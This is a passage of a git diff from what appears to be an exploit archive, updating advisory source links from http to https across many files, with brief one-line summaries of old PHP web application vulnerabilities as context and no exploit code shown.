diff --git a/exploits/php/webapps/25639.txt b/exploits/php/webapps/25639.txt index a235c4fed..4acf3c691 100644 --- a/exploits/php/webapps/25639.txt +++ b/exploits/php/webapps/25639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13561/info +source: https://www.securityfocus.com/bid/13561/info PwsPHP is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25640.txt b/exploits/php/webapps/25640.txt index cb322df59..35b527e10 100644 --- a/exploits/php/webapps/25640.txt +++ b/exploits/php/webapps/25640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13563/info +source: https://www.securityfocus.com/bid/13563/info PwsPHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25641.txt b/exploits/php/webapps/25641.txt index 9f9279b5b..00ee055e0 100644 --- a/exploits/php/webapps/25641.txt +++ b/exploits/php/webapps/25641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13569/info +source: https://www.securityfocus.com/bid/13569/info WowBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to using it in an SQL query. diff --git a/exploits/php/webapps/25642.txt b/exploits/php/webapps/25642.txt index 2ad50f0d7..e931622bc 100644 --- a/exploits/php/webapps/25642.txt +++ b/exploits/php/webapps/25642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13570/info +source: https://www.securityfocus.com/bid/13570/info NukeET is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25644.txt b/exploits/php/webapps/25644.txt index 8954d79e5..c5c0cc897 100644 --- a/exploits/php/webapps/25644.txt +++ b/exploits/php/webapps/25644.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13573/info +source: https://www.securityfocus.com/bid/13573/info e107 Website System is prone to a directory traversal vulnerability. This issue could be exploited to obtain the contents of arbitrary files on the vulnerable computer. diff --git a/exploits/php/webapps/25645.txt b/exploits/php/webapps/25645.txt index 086fee2a6..93bb1cd95 100644 --- a/exploits/php/webapps/25645.txt +++ b/exploits/php/webapps/25645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13576/info +source: https://www.securityfocus.com/bid/13576/info e107 Website System is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. diff --git a/exploits/php/webapps/25650.txt b/exploits/php/webapps/25650.txt index f17c54ba5..05fb79646 100644 --- a/exploits/php/webapps/25650.txt +++ b/exploits/php/webapps/25650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13599/info +source: https://www.securityfocus.com/bid/13599/info Quick.Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25653.txt b/exploits/php/webapps/25653.txt index 6eda15835..6cd74a7aa 100644 --- a/exploits/php/webapps/25653.txt +++ b/exploits/php/webapps/25653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13608/info +source: https://www.securityfocus.com/bid/13608/info DirectTopics is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25654.txt b/exploits/php/webapps/25654.txt index 10ae08752..025e3db7b 100644 --- a/exploits/php/webapps/25654.txt +++ b/exploits/php/webapps/25654.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13621/info +source: https://www.securityfocus.com/bid/13621/info Ultimate PHP Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25655.txt b/exploits/php/webapps/25655.txt index 34120a18f..b771643c2 100644 --- a/exploits/php/webapps/25655.txt +++ b/exploits/php/webapps/25655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13622/info +source: https://www.securityfocus.com/bid/13622/info Ultimate PHP Board is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25656.txt b/exploits/php/webapps/25656.txt index f14636929..fa545247f 100644 --- a/exploits/php/webapps/25656.txt +++ b/exploits/php/webapps/25656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13624/info +source: https://www.securityfocus.com/bid/13624/info OpenBB is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25657.txt b/exploits/php/webapps/25657.txt index eed38ff2d..7669ebfb3 100644 --- a/exploits/php/webapps/25657.txt +++ b/exploits/php/webapps/25657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13625/info +source: https://www.securityfocus.com/bid/13625/info OpenBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25659.txt b/exploits/php/webapps/25659.txt index 3b879da34..5e945fb7e 100644 --- a/exploits/php/webapps/25659.txt +++ b/exploits/php/webapps/25659.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13627/info +source: https://www.securityfocus.com/bid/13627/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25660.txt b/exploits/php/webapps/25660.txt index 9c11286a8..34bf42b73 100644 --- a/exploits/php/webapps/25660.txt +++ b/exploits/php/webapps/25660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13628/info +source: https://www.securityfocus.com/bid/13628/info phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25662.txt b/exploits/php/webapps/25662.txt index ef8ab441d..9ecf857a7 100644 --- a/exploits/php/webapps/25662.txt +++ b/exploits/php/webapps/25662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13632/info +source: https://www.securityfocus.com/bid/13632/info Skull-Splitter Guestbook is prone to multiple HTML injection vulnerabilities. It is possible to inject HTML and script code into the title and content of posted messages. diff --git a/exploits/php/webapps/25663.txt b/exploits/php/webapps/25663.txt index 65f4dce9b..4a179ee8d 100644 --- a/exploits/php/webapps/25663.txt +++ b/exploits/php/webapps/25663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13633/info +source: https://www.securityfocus.com/bid/13633/info Shop-Script is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25664.txt b/exploits/php/webapps/25664.txt index a098febfc..ca48c61e8 100644 --- a/exploits/php/webapps/25664.txt +++ b/exploits/php/webapps/25664.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13635/info +source: https://www.securityfocus.com/bid/13635/info Shop-Script is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/25665.txt b/exploits/php/webapps/25665.txt index 47a3a5976..bd404dfb7 100644 --- a/exploits/php/webapps/25665.txt +++ b/exploits/php/webapps/25665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13636/info +source: https://www.securityfocus.com/bid/13636/info PostNuke Blocks module is affected by a directory traversal vulnerability. diff --git a/exploits/php/webapps/25671.txt b/exploits/php/webapps/25671.txt index 6cd3d48aa..ef80fbc84 100644 --- a/exploits/php/webapps/25671.txt +++ b/exploits/php/webapps/25671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13649/info +source: https://www.securityfocus.com/bid/13649/info NPDS is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25672.txt b/exploits/php/webapps/25672.txt index 992474305..0ee496959 100644 --- a/exploits/php/webapps/25672.txt +++ b/exploits/php/webapps/25672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13649/info +source: https://www.securityfocus.com/bid/13649/info NPDS is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25673.txt b/exploits/php/webapps/25673.txt index af65b42a5..615285dbd 100644 --- a/exploits/php/webapps/25673.txt +++ b/exploits/php/webapps/25673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25674.txt b/exploits/php/webapps/25674.txt index fda412fdc..2cf756a86 100644 --- a/exploits/php/webapps/25674.txt +++ b/exploits/php/webapps/25674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25675.txt b/exploits/php/webapps/25675.txt index f6205247a..93f327b7c 100644 --- a/exploits/php/webapps/25675.txt +++ b/exploits/php/webapps/25675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25676.txt b/exploits/php/webapps/25676.txt index ed16d406b..9cea36aeb 100644 --- a/exploits/php/webapps/25676.txt +++ b/exploits/php/webapps/25676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25677.txt b/exploits/php/webapps/25677.txt index 6df7524a8..a6d3e02de 100644 --- a/exploits/php/webapps/25677.txt +++ b/exploits/php/webapps/25677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25678.txt b/exploits/php/webapps/25678.txt index d29d5b509..127b83a6f 100644 --- a/exploits/php/webapps/25678.txt +++ b/exploits/php/webapps/25678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25679.txt b/exploits/php/webapps/25679.txt index 90da2ad42..9013ef277 100644 --- a/exploits/php/webapps/25679.txt +++ b/exploits/php/webapps/25679.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13650/info +source: https://www.securityfocus.com/bid/13650/info JGS-Portal is prone to multiple cross-site scripting and SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25681.php b/exploits/php/webapps/25681.php index d5f0bef77..9bb2b927f 100644 --- a/exploits/php/webapps/25681.php +++ b/exploits/php/webapps/25681.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13661/info +source: https://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This may facilitate unauthorized access. diff --git a/exploits/php/webapps/25682.txt b/exploits/php/webapps/25682.txt index 6a2c9e8bb..a26301f7f 100644 --- a/exploits/php/webapps/25682.txt +++ b/exploits/php/webapps/25682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13663/info +source: https://www.securityfocus.com/bid/13663/info Wordpress is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25683.txt b/exploits/php/webapps/25683.txt index 332c646f8..7f1db1322 100644 --- a/exploits/php/webapps/25683.txt +++ b/exploits/php/webapps/25683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13666/info +source: https://www.securityfocus.com/bid/13666/info Help Center Live is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25686.txt b/exploits/php/webapps/25686.txt index 889804029..83f63d17d 100644 --- a/exploits/php/webapps/25686.txt +++ b/exploits/php/webapps/25686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13691/info +source: https://www.securityfocus.com/bid/13691/info PHP Advanced Transfer Manager is prone to an arbitrary file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25689.txt b/exploits/php/webapps/25689.txt index ffc1c70a6..0dece07b0 100644 --- a/exploits/php/webapps/25689.txt +++ b/exploits/php/webapps/25689.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13700/info +source: https://www.securityfocus.com/bid/13700/info TOPo is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25690.pl b/exploits/php/webapps/25690.pl index 710223d32..61b80be5f 100755 --- a/exploits/php/webapps/25690.pl +++ b/exploits/php/webapps/25690.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13708/info +source: https://www.securityfocus.com/bid/13708/info PortailPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/php/webapps/25693.txt b/exploits/php/webapps/25693.txt index 71c6903d7..32c6403b2 100644 --- a/exploits/php/webapps/25693.txt +++ b/exploits/php/webapps/25693.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13716/info +source: https://www.securityfocus.com/bid/13716/info GForge is affected by a remote command execution vulnerability. diff --git a/exploits/php/webapps/25704.txt b/exploits/php/webapps/25704.txt index 34402844e..39358f6e4 100644 --- a/exploits/php/webapps/25704.txt +++ b/exploits/php/webapps/25704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13760/info +source: https://www.securityfocus.com/bid/13760/info PHP Poll Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25727.txt b/exploits/php/webapps/25727.txt index e63825cad..703684c15 100644 --- a/exploits/php/webapps/25727.txt +++ b/exploits/php/webapps/25727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25728.txt b/exploits/php/webapps/25728.txt index 52de90b75..c1ce99d96 100644 --- a/exploits/php/webapps/25728.txt +++ b/exploits/php/webapps/25728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25729.txt b/exploits/php/webapps/25729.txt index 4cc13f3fe..e472da2b2 100644 --- a/exploits/php/webapps/25729.txt +++ b/exploits/php/webapps/25729.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25730.txt b/exploits/php/webapps/25730.txt index 864696549..e5ab1d790 100644 --- a/exploits/php/webapps/25730.txt +++ b/exploits/php/webapps/25730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25731.txt b/exploits/php/webapps/25731.txt index d9ef4f5de..4e89e28a1 100644 --- a/exploits/php/webapps/25731.txt +++ b/exploits/php/webapps/25731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25732.txt b/exploits/php/webapps/25732.txt index dd7b9afb4..071f29a92 100644 --- a/exploits/php/webapps/25732.txt +++ b/exploits/php/webapps/25732.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25733.txt b/exploits/php/webapps/25733.txt index a7212a923..8d8da6cea 100644 --- a/exploits/php/webapps/25733.txt +++ b/exploits/php/webapps/25733.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25734.txt b/exploits/php/webapps/25734.txt index ac94dc756..abc0d7b0f 100644 --- a/exploits/php/webapps/25734.txt +++ b/exploits/php/webapps/25734.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25735.txt b/exploits/php/webapps/25735.txt index 58302d709..7ef27903d 100644 --- a/exploits/php/webapps/25735.txt +++ b/exploits/php/webapps/25735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13783/info +source: https://www.securityfocus.com/bid/13783/info BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25740.txt b/exploits/php/webapps/25740.txt index 7ad1a88b2..b2b249e84 100644 --- a/exploits/php/webapps/25740.txt +++ b/exploits/php/webapps/25740.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13796/info +source: https://www.securityfocus.com/bid/13796/info JAWS is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25741.bat b/exploits/php/webapps/25741.bat index d9df449ea..ebd805861 100644 --- a/exploits/php/webapps/25741.bat +++ b/exploits/php/webapps/25741.bat @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13802/info +source: https://www.securityfocus.com/bid/13802/info Invision Power Board is affected by an unauthorized access vulnerability. 
diff --git a/exploits/php/webapps/25742.txt b/exploits/php/webapps/25742.txt index a938fcddb..9cdfa63fa 100644 --- a/exploits/php/webapps/25742.txt +++ b/exploits/php/webapps/25742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25743.txt b/exploits/php/webapps/25743.txt index 5157c8902..7cd572019 100644 --- a/exploits/php/webapps/25743.txt +++ b/exploits/php/webapps/25743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25744.txt b/exploits/php/webapps/25744.txt index f6743d41c..1dd89f494 100644 --- a/exploits/php/webapps/25744.txt +++ b/exploits/php/webapps/25744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25745.txt b/exploits/php/webapps/25745.txt index cc2dc1f55..7ace4604e 100644 --- a/exploits/php/webapps/25745.txt +++ b/exploits/php/webapps/25745.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25746.txt b/exploits/php/webapps/25746.txt index e5bb88b7e..6c66a95c7 100644 --- a/exploits/php/webapps/25746.txt +++ b/exploits/php/webapps/25746.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25747.txt b/exploits/php/webapps/25747.txt index 80572251d..079daec56 100644 --- a/exploits/php/webapps/25747.txt +++ b/exploits/php/webapps/25747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25748.txt b/exploits/php/webapps/25748.txt index c52af363f..96864f1f7 100644 --- a/exploits/php/webapps/25748.txt +++ b/exploits/php/webapps/25748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25749.txt b/exploits/php/webapps/25749.txt index 3c14e0366..844f68c07 100644 
--- a/exploits/php/webapps/25749.txt +++ b/exploits/php/webapps/25749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25750.txt b/exploits/php/webapps/25750.txt index 2d9bccc70..bbfcab264 100644 --- a/exploits/php/webapps/25750.txt +++ b/exploits/php/webapps/25750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13803/info +source: https://www.securityfocus.com/bid/13803/info NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. diff --git a/exploits/php/webapps/25756.txt b/exploits/php/webapps/25756.txt index c01ee0547..fb123a9b1 100644 --- a/exploits/php/webapps/25756.txt +++ b/exploits/php/webapps/25756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13812/info +source: https://www.securityfocus.com/bid/13812/info India Software Solution Shopping Cart is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25759.txt b/exploits/php/webapps/25759.txt index dfc48de87..2901bbe31 100644 --- a/exploits/php/webapps/25759.txt +++ b/exploits/php/webapps/25759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25760.txt b/exploits/php/webapps/25760.txt index 8bdc94b89..8ee860202 100644 --- a/exploits/php/webapps/25760.txt +++ b/exploits/php/webapps/25760.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25761.txt b/exploits/php/webapps/25761.txt index afa59a3e5..287aeb788 100644 --- a/exploits/php/webapps/25761.txt +++ b/exploits/php/webapps/25761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25762.txt b/exploits/php/webapps/25762.txt index 12964ac45..cac8c6a61 100644 --- a/exploits/php/webapps/25762.txt +++ b/exploits/php/webapps/25762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25763.txt b/exploits/php/webapps/25763.txt index 83774e66f..681a32818 100644 --- a/exploits/php/webapps/25763.txt +++ b/exploits/php/webapps/25763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25764.txt b/exploits/php/webapps/25764.txt index 9b9ab8710..b71dcd2ae 100644 --- a/exploits/php/webapps/25764.txt +++ b/exploits/php/webapps/25764.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25765.txt b/exploits/php/webapps/25765.txt index a99c8e85d..bde21e687 100644 --- a/exploits/php/webapps/25765.txt +++ b/exploits/php/webapps/25765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25766.txt b/exploits/php/webapps/25766.txt index f5a33d833..e5fc8d317 100644 --- a/exploits/php/webapps/25766.txt +++ b/exploits/php/webapps/25766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25767.txt b/exploits/php/webapps/25767.txt index 3782e5764..306d2d22a 100644 --- a/exploits/php/webapps/25767.txt +++ b/exploits/php/webapps/25767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25768.txt b/exploits/php/webapps/25768.txt index 0fd65bd71..7a96a3e14 100644 --- a/exploits/php/webapps/25768.txt +++ b/exploits/php/webapps/25768.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25769.txt b/exploits/php/webapps/25769.txt index 07a868943..ed5ee9048 100644 --- a/exploits/php/webapps/25769.txt +++ b/exploits/php/webapps/25769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25770.txt b/exploits/php/webapps/25770.txt index 553d87f72..a2e9f9425 100644 --- a/exploits/php/webapps/25770.txt +++ b/exploits/php/webapps/25770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25771.txt b/exploits/php/webapps/25771.txt index 1691909a0..98df5dba3 100644 --- a/exploits/php/webapps/25771.txt +++ b/exploits/php/webapps/25771.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25772.txt b/exploits/php/webapps/25772.txt index 5bfce13ba..0778853eb 100644 --- a/exploits/php/webapps/25772.txt +++ b/exploits/php/webapps/25772.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25773.txt b/exploits/php/webapps/25773.txt index 7b142bc8d..3fbbcfba9 100644 --- a/exploits/php/webapps/25773.txt +++ b/exploits/php/webapps/25773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to SQL injection and cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25774.txt b/exploits/php/webapps/25774.txt index 3252e78cb..eb6dbb9a6 100644 --- a/exploits/php/webapps/25774.txt +++ b/exploits/php/webapps/25774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13817/info +source: https://www.securityfocus.com/bid/13817/info X-Cart is prone to 